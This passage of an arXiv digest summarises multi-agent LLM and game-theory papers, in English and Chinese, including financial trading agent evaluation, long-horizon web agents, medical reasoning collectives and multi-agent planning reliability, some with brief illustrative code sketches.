Abstract:Real-world mathematical modeling is inherently an experiential and collaborative endeavor. Domain experts rarely solve complex problems from scratch; instead, they draw upon analogies from historical cases and subject their hypotheses to rigorous peer scrutiny. However, autonomous agents powered by Large Language Models predominantly rely on isolated reasoning paradigms, frequently generating plausible but fundamentally flawed models due to a lack of domain grounding and adversarial verification. To address these limitations, we propose Sci-Mind, a novel framework that mirrors the human scientific discovery process. Sci-Mind integrates Experiential Memory Recall to retrieve executable code snippets and modeling paradigm descriptors, grounding abstract reasoning in historical solutions. Subsequently, it employs an Adversarial Cognitive Dialectic where a Theorist optimizing mathematical coherence and a Pragmatist enforcing data feasibility debate through competing objectives to prune elegant but infeasible formulations. A Self-Validating Execution Strategy further ensures blueprint consistency through formal predicates before code generation, achieving fully autonomous execution. Extensive experiments on the MM-Bench and EngiBench benchmarks demonstrate that Sci-Mind significantly outperforms leading autonomous agents in both modeling rigorousness and code executability.
[MA-13] Toward Reliable Evaluation of LLM-Based Financial Multi-Agent Systems: Taxonomy, Coordination Primacy, and Cost Awareness (PAKDD 2026)
Quick Read: This paper addresses the lack of a unified evaluation framework for multi-agent systems (MAS) in financial trading, where the drivers of performance are unclear and systematic evaluation biases make reported conclusions unreliable. The core contributions are a four-dimensional taxonomy (architecture pattern, coordination mechanism, memory architecture, and tool integration) and the first systematic formulation of the Coordination Primacy Hypothesis (CPH): inter-agent coordination protocol design often influences trading decision quality more than model scaling. The paper also documents five pervasive evaluation failures (including look-ahead bias and survivorship bias) that can reverse the sign of reported returns, and introduces the Coordination Breakeven Spread (CBS), a metric for whether multi-agent coordination adds genuine value net of transaction costs, along with minimum evaluation standards as prerequisites for credibly validating the CPH.
Link: https://arxiv.org/abs/2603.27539
Authors: Phat Nguyen, Thang Pham
Affiliation: unknown
Categories: Multiagent Systems (cs.MA); Artificial Intelligence (cs.AI); Computational Engineering, Finance, and Science (cs.CE)
Comments: Accepted at the DMO-FinTech Workshop, PAKDD 2026, Hong Kong
Abstract:Multi-agent systems based on large language models (LLMs) for financial trading have grown rapidly since 2023, yet the field lacks a shared framework for understanding what drives performance or for evaluating claims credibly. This survey makes three contributions. First, we introduce a four-dimensional taxonomy, covering architecture pattern, coordination mechanism, memory architecture, and tool integration; applied to 12 multi-agent systems and two single-agent baselines. Second, we formulate the Coordination Primacy Hypothesis (CPH): inter-agent coordination protocol design is a primary driver of trading decision quality, often exerting greater influence than model scaling. CPH is presented as a falsifiable research hypothesis supported by tiered structural evidence rather than as an empirically validated conclusion; its definitive validation requires evaluation infrastructure that does not yet exist in the field. Third, we document five pervasive evaluation failures (look-ahead bias, survivorship bias, backtesting overfitting, transaction cost neglect, and regime-shift blindness) and show that these can reverse the sign of reported returns. Building on the CPH and the evaluation critique, we introduce the Coordination Breakeven Spread (CBS), a metric for determining whether multi-agent coordination adds genuine value net of transaction costs, and propose minimum evaluation standards as prerequisites for validating the CPH.
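The abstract does not give CBS's exact formula; the sketch below only encodes its stated intent under hypothetical assumptions: coordination adds genuine value only if the multi-agent return advantage survives the extra trading costs it induces. Function name, signature, and all numbers are illustrative.

```python
def coordination_breakeven_spread(multi_return, single_return,
                                  multi_turnover, single_turnover,
                                  cost_per_unit_turnover):
    """Positive => coordination adds value net of transaction costs."""
    gross_spread = multi_return - single_return
    extra_costs = (multi_turnover - single_turnover) * cost_per_unit_turnover
    return gross_spread - extra_costs

# Coordination earns 2 pp more but quadruples turnover at 30 bp/unit.
print(coordination_breakeven_spread(0.12, 0.10, 8.0, 2.0, 0.003))
```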
[MA-14] AgentSwing: Adaptive Parallel Context Management Routing for Long-Horizon Web Agents
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)作为长程信息搜索代理时,受限于有限上下文容量所导致的性能瓶颈问题。现有方法通常采用单一固定策略进行上下文管理,难以适应搜索过程中累积上下文有用性和可靠性动态变化的特性。解决方案的关键在于提出AgentSwing框架——一种状态感知的自适应并行上下文管理路由机制:在每个触发点并行扩展多个上下文管理分支,并通过前瞻路由选择最具潜力的延续路径,从而实现对长程任务中搜索效率与最终精度的协同优化。
链接: https://arxiv.org/abs/2603.27490
作者: Zhaopeng Feng,Liangcai Su,Zhen Zhang,Xinyu Wang,Xiaotian Zhang,Xiaobin Wang,Runnan Fang,Qi Zhang,Baixuan Li,Shihao Cai,Rui Ye,Hui Chen,Jiang Yong,Joey Tianyi Zhou,Chenxiong Qian,Pengjun Xie,Bryan Hooi,Zuozhu Liu,Jingren Zhou
机构: Tongyi Lab (通义实验室); Alibaba Group (阿里巴巴集团)
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI); Multiagent Systems (cs.MA)
备注:
Abstract:As large language models (LLMs) evolve into autonomous agents for long-horizon information-seeking, managing finite context capacity has become a critical bottleneck. Existing context management methods typically commit to a single fixed strategy throughout the entire trajectory. Such static designs may work well in some states, but they cannot adapt as the usefulness and reliability of the accumulated context evolve during long-horizon search. To formalize this challenge, we introduce a probabilistic framework that characterizes long-horizon success through two complementary dimensions: search efficiency and terminal precision. Building on this perspective, we propose AgentSwing, a state-aware adaptive parallel context management routing framework. At each trigger point, AgentSwing expands multiple context-managed branches in parallel and uses lookahead routing to select the most promising continuation. Experiments across diverse benchmarks and agent backbones show that AgentSwing consistently outperforms strong static context management methods, often matching or exceeding their performance with up to 3× fewer interaction turns while also improving the ultimate performance ceiling of long-horizon web agents. Beyond the empirical gains, the proposed probabilistic framework provides a principled lens for analyzing and designing future context management strategies for long-horizon agents.
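摘要中"在触发点并行扩展多个上下文管理分支、再由前瞻路由择优"的流程,可以用如下极简Python示意;策略集合与打分函数均为假设,真实系统中的前瞻路由由模型对各分支续写质量进行评估。

```python
def route_context(context, strategies, lookahead_score):
    """Expand one branch per context-management strategy at a trigger
    point, then keep the branch the lookahead scorer ranks highest.
    `strategies` maps a name to a function context -> managed context;
    `lookahead_score` is a stand-in for the paper's lookahead router."""
    branches = {name: fn(context) for name, fn in strategies.items()}
    best = max(branches, key=lambda name: lookahead_score(branches[name]))
    return best, branches[best]
```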
[MA-15] Heterogeneous Debate Engine: Identity-Grounded Cognitive Architecture for Resilient LLM-Based Ethical Tutoring
【速读】:该论文旨在解决多智能体系统在复杂推理任务中因缺乏约束而导致的语义漂移(semantic drift)和逻辑退化问题,特别是在伦理辅导等需要精确答案的场景下,当前模拟常陷入辩证停滞(dialectical stagnation),表现为智能体产生递归同质或循环论证。解决方案的关键在于提出异质辩论引擎(Heterogeneous Debate Engine, HDE),其核心由两部分构成:一是基于身份锚定的检索增强生成(Identity-Grounded Retrieval-Augmented Generation, ID-RAG),确保教义一致性(doctrinal fidelity);二是启发式心智理论(Heuristic Theory of Mind, Heuristic ToM),用于战略对手建模以提升辩论质量。实验证明,采用对立初始信念(如义务论 vs. 功利主义)可使学生论证复杂度提升一个数量级,验证了ID-RAG与Heuristic ToM作为架构要素对维持高保真(对抗性)教学的有效性。
链接: https://arxiv.org/abs/2603.27404
作者: Jakub Masłowski,Jarosław A. Chudziak
机构: 未知
类目: Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Computers and Society (cs.CY); Human-Computer Interaction (cs.HC); Multiagent Systems (cs.MA)
备注: 15 pages, 3 figures, 4 tables. Accepted at ACIIDS 2026
Abstract:Large Language Models (LLMs) are being increasingly used as autonomous agents in complex reasoning tasks, opening the niche for dialectical interactions. However, unconstrained multi-agent systems systematically undergo semantic drift and logical deterioration, and thus can hardly be used to provide ethical tutoring, where a precise answer is required. Current simulations often degenerate into dialectical stagnation: the agents fall into recursive concurrence or circular arguments. A critical challenge remains: how to enforce doctrinal fidelity without suppressing the generative flexibility required for dialectical reasoning? To address this niche, we contribute the Heterogeneous Debate Engine (HDE), a cognitive architecture that combines Identity-Grounded Retrieval-Augmented Generation (ID-RAG) for doctrinal fidelity and Heuristic Theory of Mind for strategic opponent modeling. Our evaluation shows that architectural heterogeneity is a crucial variable for stability: contrary doctrinal initializations (e.g., Deontology vs. Utilitarianism) increased the Argument Complexity Scores of students by an order of magnitude over baselines. These findings validate the effectiveness of ID-RAG and Heuristic ToM as architectural requirements in maintaining high-fidelity (adversarial) pedagogy.
[MA-16] GUIDE: Guided Updates for In-context Decision Evolution in LLM-Driven Spacecraft Operations CVPR2026
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)在航天器操作中作为监督代理时,因依赖静态提示(static prompting)而无法在多次执行中持续改进的问题。其解决方案的关键在于提出一种非参数化的策略优化框架——GUIDE,该框架通过演化一个结构化的、状态条件化的自然语言决策规则手册(playbook),实现跨episode的适应性提升,且无需更新模型权重;其中轻量级执行模型负责实时控制,离线反思机制则基于历史轨迹迭代优化决策手册,从而在真实闭环航天交互中实现对结构化决策规则的有效策略搜索。
链接: https://arxiv.org/abs/2603.27306
作者: Alejandro Carrasco,Mariko Storey-Matsutani,Victor Rodriguez-Fernandez,Richard Linares
机构: Massachusetts Institute of Technology (麻省理工学院); Universidad Politecnica de Madrid (马德里理工大学)
类目: Multiagent Systems (cs.MA); Artificial Intelligence (cs.AI); Systems and Control (eess.SY)
备注: Accepted to AI4Space@CVPR Workshop in CVPR 2026
Abstract:Large language models (LLMs) have been proposed as supervisory agents for spacecraft operations, but existing approaches rely on static prompting and do not improve across repeated executions. We introduce GUIDE, a non-parametric policy improvement framework that enables cross-episode adaptation without weight updates by evolving a structured, state-conditioned playbook of natural-language decision rules. A lightweight acting model performs real-time control, while offline reflection updates the playbook from prior trajectories. Evaluated on an adversarial orbital interception task in the Kerbal Space Program Differential Games environment, GUIDE’s evolution consistently outperforms static baselines. Results indicate that context evolution in LLM agents functions as policy search over structured decision rules in real-time closed-loop spacecraft interaction.
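GUIDE"离线反思更新决策规则手册"的思路可以粗略示意如下:手册按状态条件索引自然语言规则,反思阶段根据整条轨迹的成败调升或调降规则得分,并淘汰长期失效的规则。评分方式与淘汰阈值均为此处为演示而设的假设,并非论文的具体实现。

```python
def reflect(playbook, trajectory, succeeded, prune_below=-2):
    """Illustrative offline-reflection step: reinforce rules that fired in
    a successful episode, demote ones that fired in a failure, and drop
    rules whose score falls below a threshold. `trajectory` is a list of
    (state_condition, rule_text) pairs recorded by the acting model."""
    for state, rule in trajectory:
        entry = playbook.setdefault(state, {"rule": rule, "score": 0})
        entry["score"] += 1 if succeeded else -1
    return {s: e for s, e in playbook.items() if e["score"] > prune_below}
```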
[MA-17] EpochX: Building the Infrastructure for an Emergent Agent Civilization
【速读】:该论文试图解决的问题是:随着基础模型使任务执行和工具使用变得日益普及,生成式 AI (Generative AI) 的发展正从单纯提升个体能力转向如何在大规模上高效地分配、验证和激励工作,即如何构建可持续的人机协作生产网络。解决方案的关键在于提出 EpochX——一个以“信用(credits)”为原生机制的市场基础设施,它将人类与智能体视为平等参与者,通过显式的交付流程实现任务分解、执行、验证与接受,并在每次交易中生成可复用的生态系统资产(如技能、工作流、执行轨迹和提炼经验),这些资产具有明确的依赖结构,支持检索、组合与持续迭代优化;同时,信用机制确保了真实计算成本下的经济可行性,通过锁定赏金、预算委托、奖励结算及再利用补偿等机制,推动持久的人机协同价值流动。
链接: https://arxiv.org/abs/2603.27304
作者: Huacan Wang,Chaofa Yuan,Xialie Zhuang,Tu Hu,Shuo Zhang,Jun Han,Shi Wei,Daiqiang Li,Jingping Liu,Kunyi Wang,Zihan Yin,Zhenheng Tang,Andy Wang,Henry Peng Zou,Philip S. Yu,Sen Hu,Qizhen Lan,Ronghao Chen
机构: QuantaAlpha
类目: Artificial Intelligence (cs.AI); Multiagent Systems (cs.MA)
备注:
Abstract:General-purpose technologies reshape economies less by improving individual tools than by enabling new ways to organize production and coordination. We believe AI agents are approaching a similar inflection point: as foundation models make broad task execution and tool use increasingly accessible, the binding constraint shifts from raw capability to how work is delegated, verified, and rewarded at scale. We introduce EpochX, a credits-native marketplace infrastructure for human-agent production networks. EpochX treats humans and agents as peer participants who can post tasks or claim them. Claimed tasks can be decomposed into subtasks and executed through an explicit delivery workflow with verification and acceptance. Crucially, EpochX is designed so that each completed transaction can produce reusable ecosystem assets, including skills, workflows, execution traces, and distilled experience. These assets are stored with explicit dependency structure, enabling retrieval, composition, and cumulative improvement over time. EpochX also introduces a native credit mechanism to make participation economically viable under real compute costs. Credits lock task bounties, budget delegation, settle rewards upon acceptance, and compensate creators when verified assets are reused. By formalizing the end-to-end transaction model together with its asset and incentive layers, EpochX reframes agentic AI as an organizational design problem: building infrastructures where verifiable work leaves persistent, reusable artifacts, and where value flows support durable human-agent collaboration.
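摘要描述的信用流转(发布任务时锁定赏金、验收后向执行方结算、资产复用时向创建者付费)可以用一个极简账本示意;类名、方法与金额均为假设,摘要并未规定任何具体接口。

```python
class CreditLedger:
    """Minimal sketch of the credits flow: bounties are escrowed on task
    posting, settled to the worker on acceptance, and asset reuse pays a
    fee to the asset's creator. Names and APIs are illustrative only."""
    def __init__(self, balances):
        self.balances = dict(balances)
        self.escrow = {}

    def post_task(self, task_id, poster, bounty):
        assert self.balances[poster] >= bounty, "insufficient credits"
        self.balances[poster] -= bounty
        self.escrow[task_id] = bounty  # locked until acceptance

    def accept(self, task_id, worker):
        self.balances[worker] = self.balances.get(worker, 0) + self.escrow.pop(task_id)

    def reuse_asset(self, user, creator, fee):
        self.balances[user] -= fee
        self.balances[creator] = self.balances.get(creator, 0) + fee
```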
[MA-18] MediHive: A Decentralized Agent Collective for Medical Reasoning
【速读】:该论文旨在解决单智能体大语言模型(Large Language Models, LLMs)在处理复杂、跨学科医疗推理任务时因不确定性管理和冲突证据处理能力不足而导致的性能瓶颈问题,同时克服集中式多智能体系统(Multi-agent Systems, MAS)在资源受限环境中存在的可扩展性差、单点故障风险高及角色混淆等缺陷。其解决方案的关键在于提出一种名为MediHive的去中心化多智能体框架(Decentralized Multi-agent System, D-MAS),该框架通过引入共享记忆池与迭代融合机制,使基于LLM的智能体能够自主分配专业角色、执行初始分析、基于条件证据开展辩论以识别分歧,并在多轮本地融合同伴见解以达成共识,从而实现高可靠性与强鲁棒性的医疗问答推理。
链接: https://arxiv.org/abs/2603.27150
作者: Xiaoyang Wang,Christopher C. Yang
机构: 未知
类目: Artificial Intelligence (cs.AI); Multiagent Systems (cs.MA)
备注: Accepted to the 14th IEEE International Conference on Healthcare Informatics (IEEE ICHI 2026)
Abstract:Large language models (LLMs) have revolutionized medical reasoning tasks, yet single-agent systems often falter on complex, interdisciplinary problems requiring robust handling of uncertainty and conflicting evidence. Multi-agent systems (MAS) leveraging LLMs enable collaborative intelligence, but prevailing centralized architectures suffer from scalability bottlenecks, single points of failure, and role confusion in resource-constrained environments. Decentralized MAS (D-MAS) promise enhanced autonomy and resilience via peer-to-peer interactions, but their application to high-stakes healthcare domains remains underexplored. We introduce MediHive, a novel decentralized multi-agent framework for medical question answering that integrates a shared memory pool with iterative fusion mechanisms. MediHive deploys LLM-based agents that autonomously self-assign specialized roles, conduct initial analyses, detect divergences through conditional evidence-based debates, and locally fuse peer insights over multiple rounds to achieve consensus. Empirically, MediHive outperforms single-LLM and centralized baselines on MedQA and PubMedQA datasets, attaining accuracies of 84.3% and 78.4%, respectively. Our work advances scalable, fault-tolerant D-MAS for medical AI, addressing key limitations of centralized designs while demonstrating superior performance in reasoning-intensive tasks.
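摘要中"多轮本地融合同伴见解以达成共识"的过程可以抽象成如下玩具循环:每一轮,各智能体读取共享池中的答案,与多数意见相左者采纳多数答案。这只是最简化的示意;真实系统中这一步由基于证据的条件化辩论替代。

```python
def iterative_fusion(answers, max_rounds=3):
    """Toy stand-in for MediHive's fusion loop: per round, each agent
    reads the shared pool and adopts the current majority answer if it
    disagrees; stops early once consensus is reached."""
    for _ in range(max_rounds):
        majority = max(set(answers), key=answers.count)
        if all(a == majority for a in answers):
            break
        answers = [majority for _ in answers]
    return answers
```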
[MA-19] A Controllability Perspective on Steering Follow-the-Regularized-Leader Learners in Games
【速读】:该论文旨在解决多智能体博弈中控制器如何通过自身策略调整,引导采用连续时间FTRL(Follow-the-regularized-leader)学习动态的其他智能体收敛至目标状态的问题,且不改变原博弈的收益结构。其核心挑战在于:FTRL算法通常使每个智能体独立更新策略,忽略与其他智能体之间的耦合关系,导致全局行为难以被控制。解决方案的关键在于将学习者的动态建模为定义在单纯形或单纯形乘积内部的非线性控制系统,并基于控制理论中的可控制性条件设计控制器策略:对于双人博弈,提出存在完全混合中和策略(fully mixed neutralizing controller strategy)与投影收益映射秩条件的充要可控制性判据;对于多人博弈,则给出两种充分条件——一种依赖于均匀中和机制,另一种结合周期漂移假设与李代数秩条件,从而实现对系统稳态行为的有效调控。
链接: https://arxiv.org/abs/2603.27081
作者: Heling Zhang,Siqi Du,Roy Dong
机构: University of Illinois Urbana-Champaign (伊利诺伊大学厄巴纳-香槟分校)
类目: Systems and Control (eess.SY); Multiagent Systems (cs.MA)
备注: Submitted to IEEE TAC
Abstract:Follow-the-regularized-leader (FTRL) algorithms have become popular in the context of games, providing easy-to-implement methods for each agent, as well as theoretical guarantees that the strategies of all agents will converge to some equilibrium concept (provided that all agents follow the appropriate dynamics). However, with these methods, each agent ignores the coupling in the game, and treats their payoff vectors as exogenously given. In this paper, we take the perspective of one agent (the controller) deciding their mixed strategies in a finite game, while one or more other agents update their mixed strategies according to continuous-time FTRL. Viewing the learners’ dynamics as a nonlinear control system evolving on the relative interior of a simplex or product of simplices, we ask when the controller can steer the learners to a target state, using only its own mixed strategy and without modifying the game’s payoff structure. For the two-player case we provide a necessary and sufficient criterion for controllability based on the existence of a fully mixed neutralizing controller strategy and a rank condition on the projected payoff map. For multi-learner interactions we give two sufficient controllability conditions, one based on uniform neutralization and one based on a periodic-drift hypothesis together with a Lie-algebra rank condition. We illustrate these results on canonical examples such as Rock-Paper-Scissors and a construction related to Brockett’s integrator.
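摘要中被控对象是连续时间FTRL学习者;取熵正则项时,FTRL等价于指数权重动力学。下面用欧拉离散模拟石头剪刀布中,学习者面对控制器固定混合策略时向最优反应收敛的过程(步长与步数为演示取值)。

```python
import math

def softmax(y):
    m = max(y)
    exps = [math.exp(v - m) for v in y]
    total = sum(exps)
    return [e / total for e in exps]

def ftrl_learner(payoffs, controller, steps=2000, dt=0.01):
    """Euler discretization of continuous-time FTRL with an entropic
    regularizer: the score of each pure action integrates its expected
    payoff against the controller's mixed strategy, and the learner's
    strategy is the softmax of the scores."""
    y = [0.0] * len(payoffs)
    for _ in range(steps):
        expected = [sum(row[j] * controller[j] for j in range(len(controller)))
                    for row in payoffs]
        y = [yi + dt * gi for yi, gi in zip(y, expected)]
    return softmax(y)

# Rock-Paper-Scissors payoffs for the learner (rows: R, P, S)
RPS = [[0, -1, 1], [1, 0, -1], [-1, 1, 0]]
```

当控制器主要出石头(混合策略 [0.8, 0.1, 0.1])时,学习者策略几乎全部集中到"布"上;这正是摘要中"仅用控制器自身策略引导学习者状态"的最简单情形。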
[MA-20] On the Reliability Limits of LLM-Based Multi-Agent Planning
【速读】:该论文旨在解决基于大语言模型(Large Language Models, LLMs)的多智能体规划系统在委托决策场景下的可靠性极限问题。其核心挑战在于:当多个智能体通过有限容量的语言接口共享信息并进行协作时,如何量化其决策性能相对于最优集中式贝叶斯决策者的损失。解决方案的关键在于将多智能体架构建模为一个有限无环决策网络,并证明在无外生信号条件下,任何此类委托网络在决策理论上均被具有相同信息访问权限的集中式贝叶斯决策者所支配。进一步地,在共同证据(common-evidence)假设下,优化多智能体有向无环图(multi-agent directed acyclic graphs)等价于在通信预算约束下选择对共享信号的随机实验;同时,作者通过适当评分规则(如对数损失和Brier评分)刻画了通信与信息压缩带来的损失,发现该损失可表示为期望后验发散,分别对应条件互信息和期望平方后验误差。这一理论框架揭示了LLM代理规划系统的根本可靠性边界,并通过控制实验验证了理论预测。
链接: https://arxiv.org/abs/2603.26993
作者: Ruicheng Ao,Siyang Gao,David Simchi-Levi
机构: 1. Massachusetts Institute of Technology (麻省理工学院); 2. University of California, Berkeley (加州大学伯克利分校); 3. MIT Sloan School of Management (麻省理工学院斯隆管理学院); 4. Operations Research Center, MIT (麻省理工学院运筹学中心)
类目: Multiagent Systems (cs.MA); Machine Learning (cs.LG); Optimization and Control (math.OC); Machine Learning (stat.ML)
备注: Technical note
Abstract:This technical note studies the reliability limits of LLM-based multi-agent planning as a delegated decision problem. We model the LLM-based multi-agent architecture as a finite acyclic decision network in which multiple stages process shared model-context information, communicate through language interfaces with limited capacity, and may invoke human review. We show that, without new exogenous signals, any delegated network is decision-theoretically dominated by a centralized Bayes decision maker with access to the same information. In the common-evidence regime, this implies that optimizing over multi-agent directed acyclic graphs under a finite communication budget can be recast as choosing a budget-constrained stochastic experiment on the shared signal. We also characterize the loss induced by communication and information compression. Under proper scoring rules, the gap between the centralized Bayes value and the value after communication admits an expected posterior divergence representation, which reduces to conditional mutual information under logarithmic loss and to expected squared posterior error under the Brier score. These results characterize the fundamental reliability limits of delegated LLM planning. Experiments with LLMs on a controlled problem set further demonstrate these characterizations.
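摘要指出在对数损失下,集中式贝叶斯价值与通信后价值之差退化为条件互信息;下例在一个两状态离散玩具模型上计算 I(X;Y),并验证经过确定性压缩(对应有限容量语言接口)后互信息不增,符合数据处理不等式。

```python
import math

def mutual_information(joint):
    """I(X;Y) in nats from a joint pmf given as {(x, y): p}."""
    px, py = {}, {}
    for (x, y), p in joint.items():
        px[x] = px.get(x, 0.0) + p
        py[y] = py.get(y, 0.0) + p
    return sum(p * math.log(p / (px[x] * py[y]))
               for (x, y), p in joint.items() if p > 0)

def compress(joint, f):
    """Push the signal through a deterministic map m = f(y), modeling a
    capacity-limited interface; I(X; f(Y)) <= I(X; Y) always holds."""
    out = {}
    for (x, y), p in joint.items():
        key = (x, f(y))
        out[key] = out.get(key, 0.0) + p
    return out
```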
[MA-21] Breaking Exponential Complexity in Games of Ordered Preference: A Tractable Reformulation
【速读】:该论文旨在解决多玩家有序偏好博弈(Games of Ordered Preference, GOOP)中因传统方法导致的可扩展性瓶颈问题。现有方法通过单层重构将字典序约束的纳什均衡必要条件转化为KKT系统,但其原始变量和对偶变量数量随偏好层级数呈指数增长,难以处理大规模问题。解决方案的关键在于提出一种紧凑型重构形式,该形式保留了跨层级的原始最优性结构,从而得到一个规模仅随玩家数和偏好层级数多项式增长的“简化”KKT系统。此简化系统虽为完整KKT系统的松弛形式,但仍为局部GOOP均衡点的必要条件;在二次目标与线性约束情形下,其最优解集与完整KKT系统一致;对于一般光滑非线性情形,该条件可识别所有局部GOOP均衡点,但可能引入虚假解,为此进一步引入二阶充分条件以验证候选点是否为真实均衡,并开发了具有局部二次收敛性的原-对偶内点法用于高效求解。
链接: https://arxiv.org/abs/2603.26950
作者: Dong Ho Lee,Jingqi Li,Lasse Peters,Georgios Bakirtzis,David Fridovich-Keil
机构: 未知
类目: Computer Science and Game Theory (cs.GT); Multiagent Systems (cs.MA)
备注:
Abstract:Games of ordered preference (GOOPs) model multi-player equilibrium problems in which each player maintains a distinct hierarchy of strictly prioritized objectives. Existing approaches solve GOOPs by deriving and enforcing the necessary optimality conditions that characterize lexicographically constrained Nash equilibria through a single-level reformulation. However, the number of primal and dual variables in the resulting KKT system grows exponentially with the number of preference levels, leading to severe scalability challenges. We derive a compact reformulation of these necessary conditions that preserves the essential primal stationarity structure across hierarchy levels, yielding a “reduced” KKT system whose size grows polynomially with both the number of players and the number of preference levels. The reduced system constitutes a relaxation of the complete KKT system, yet it remains a valid necessary condition for local GOOP equilibria. For GOOPs with quadratic objectives and linear constraints, we prove that the primal solution sets of the reduced and complete KKT systems coincide. More generally, for GOOPs with arbitrary (but smooth) nonlinear objectives and constraints, the reduced KKT conditions recover all local GOOP equilibria but may admit spurious non-equilibrium solutions. We introduce a second-order sufficient condition to certify when a candidate point corresponds to a local GOOP equilibrium. We also develop a primal-dual interior-point method for computing a local GOOP equilibrium with local quadratic convergence. The resulting framework enables scalable and efficient computation of GOOP equilibria beyond the tractable range of existing exponentially complex formulations.
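GOOP中每个玩家的目标按严格优先级排列;"字典序最优"的含义可用下面的小函数说明:先最大化首要目标,仅在(近似)并列者之间再比较次级目标。容差参数为演示所设。

```python
def lexicographic_best(actions, objectives, tol=1e-9):
    """Filter candidates objective by objective in priority order:
    keep only (near-)maximizers of each objective before consulting the
    next one, mirroring the prioritized structure of a GOOP player."""
    candidates = list(actions)
    for obj in objectives:
        best = max(obj(a) for a in candidates)
        candidates = [a for a in candidates if obj(a) >= best - tol]
    return candidates
```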
[MA-22] Toward Evaluation Frameworks for Multi-Agent Scientific AI Systems
【速读】:该论文旨在解决科学领域(多)智能体系统(multi-agent systems)在基准测试(benchmarking)过程中面临的多重挑战,包括推理与检索难以区分、数据/模型污染风险、新颖科研问题缺乏可靠真实标签(ground truth)、工具使用引入的复杂性,以及因知识库持续更新导致的复现困难。其解决方案的关键在于构建抗污染的问题、生成可扩展的任务家族,并通过多轮交互评估来更贴近真实的科学研究实践;同时,作者以量子科学领域的研究人员访谈结果为基础,进一步明确科学家对AI系统的预期交互方式,从而指导评价方法的设计,确保评估体系能够反映实际应用场景中的能力表现。
链接: https://arxiv.org/abs/2603.26718
作者: Marcin Abram
机构: 未知
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI); Multiagent Systems (cs.MA); Quantum Physics (quant-ph)
备注: 13 pages, 3 figures
Abstract:We analyze the challenges of benchmarking scientific (multi)-agentic systems, including the difficulty of distinguishing reasoning from retrieval, the risks of data/model contamination, the lack of reliable ground truth for novel research problems, the complications introduced by tool use, and the replication challenges due to the continuously changing/updating knowledge base. We discuss strategies for constructing contamination-resistant problems, generating scalable families of tasks, and the need for evaluating systems through multi-turn interactions that better reflect real scientific practice. As an early feasibility test, we demonstrate how to construct a dataset of novel research ideas to test the out-of-sample performance of our system. We also discuss the results of interviews with several researchers and engineers working in quantum science. Through those interviews, we examine how scientists expect to interact with AI systems and how these expectations should shape evaluation methods.
[MA-23] Agentic AI for Human Resources: LLM-Driven Candidate Assessment EACL2026
【速读】:该论文旨在解决传统招聘系统(如ATS)在候选人评估中依赖关键词匹配或浅层评分、缺乏透明度与专业性的问题。其核心挑战在于如何实现基于角色的精细化、可解释的评估,并高效生成高质量的候选人群体排名。解决方案的关键在于提出一个模块化且可解释的框架,利用大语言模型(Large Language Models, LLMs)整合岗位描述、简历、面试记录和HR反馈等多源信息,生成结构化的评估报告;并创新性地引入LLM驱动的主动式列表锦标赛机制(LLM-Driven Active Listwise Tournament),通过小规模候选子集的列表偏好排序(listwise preference modeling)结合Plackett-Luce模型聚合,实现全局一致且样本高效的排名,显著优于传统的成对比较或独立打分方式,为人才选拔提供了可审计、可追溯的自动化决策支持。
链接: https://arxiv.org/abs/2603.26710
作者: Kamer Ali Yuksel,Abdul Basit Anees,Ashraf Elneima,Sanjika Hewavitharana,Mohamed Al-Badrashiny,Hassan Sawaf
机构: 未知
类目: Information Retrieval (cs.IR); Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Multiagent Systems (cs.MA)
备注: Published in 19th Conference of the European Chapter of the Association for Computational Linguistics (EACL 2026)
Abstract:In this work, we present a modular and interpretable framework that uses Large Language Models (LLMs) to automate candidate assessment in recruitment. The system integrates diverse sources, including job descriptions, CVs, interview transcripts, and HR feedback, to generate structured evaluation reports that mirror expert judgment. Unlike traditional ATS tools that rely on keyword matching or shallow scoring, our approach employs role-specific, LLM-generated rubrics and a multi-agent architecture to perform fine-grained, criteria-driven evaluations. The framework outputs detailed assessment reports, candidate comparisons, and ranked recommendations that are transparent, auditable, and suitable for real-world hiring workflows. Beyond rubric-based analysis, we introduce an LLM-Driven Active Listwise Tournament mechanism for candidate ranking. Instead of noisy pairwise comparisons or inconsistent independent scoring, the LLM ranks small candidate subsets (mini-tournaments), and these listwise permutations are aggregated using a Plackett-Luce model. An active-learning loop selects the most informative subsets, producing globally coherent and sample-efficient rankings. This adaptation of listwise LLM preference modeling (previously explored in financial asset ranking) provides a principled and highly interpretable methodology for large-scale candidate ranking in talent acquisition.
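摘要用Plackett-Luce模型聚合小型"列表锦标赛"的排序;该模型下一条完整排序的对数似然可直接写出:每个位置上,剩余候选人中效用为 s_i 者被选中的概率为 exp(s_i)/Σ_j exp(s_j)。

```python
import math

def plackett_luce_logprob(ranking, scores):
    """Log-likelihood of an observed listwise ranking (best first) under
    the Plackett-Luce model with per-candidate utilities `scores`."""
    remaining = list(ranking)
    logp = 0.0
    for winner in ranking:
        denom = sum(math.exp(scores[c]) for c in remaining)
        logp += scores[winner] - math.log(denom)
        remaining.remove(winner)
    return logp
```

将各迷你锦标赛排序的对数似然相加,即得到对候选人全局效用做最大似然估计的目标函数;主动学习环节则选择信息量最大的子集参加下一轮。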
[MA-24] Decoupling Geometric Planning and Execution in Scalable Multi-Agent Path Finding
【速读】:该论文旨在解决多智能体路径规划(Multi-Agent Path Finding, MAPF)中因中央冲突消解和时间扩展模型导致的可扩展性瓶颈问题,尤其在大规模或高密度场景下性能受限。解决方案的关键在于提出一种混合优先级框架:第一阶段通过几何冲突预判(Geometric Conflict Preemption, GCP)在原始图上使用A*算法顺序规划路径,并通过对高优先级路径占用顶点的边进行成本膨胀来诱导空间绕行,从而避免显式的时间推理;第二阶段采用去中心化的局部控制器(Decentralized Local Controller, DLC),基于顶点FIFO授权队列执行路径,在必要时插入等待动作以避免顶点和边交换冲突。该方法实现了近线性的运行时间增长并保证了高成功率,且在瓶颈密集的地图上显著减少了同步引发的等待,提升了总成本(Sum-of-Costs, SOC)性能。
链接: https://arxiv.org/abs/2603.26684
作者: Fernando Salanova,Cristian Mahulea,Eduardo Montijano
机构: 未知
类目: Multiagent Systems (cs.MA); Robotics (cs.RO)
备注: 6 pages, 3 figures WODES submission
